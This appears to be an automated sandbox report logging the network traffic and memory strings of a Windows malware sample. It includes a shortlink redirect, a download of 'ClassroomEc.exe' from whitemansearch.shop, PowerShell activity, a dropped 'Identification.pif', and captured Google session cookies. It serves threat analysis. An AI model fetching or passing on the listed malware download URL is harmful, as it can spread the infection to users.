Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91

Source: global traffic	HTTP traffic detected: GET /2ZrVm4 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000002512400CC HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: 2no.co

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000004.00000002.2120550073.0000000007969000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
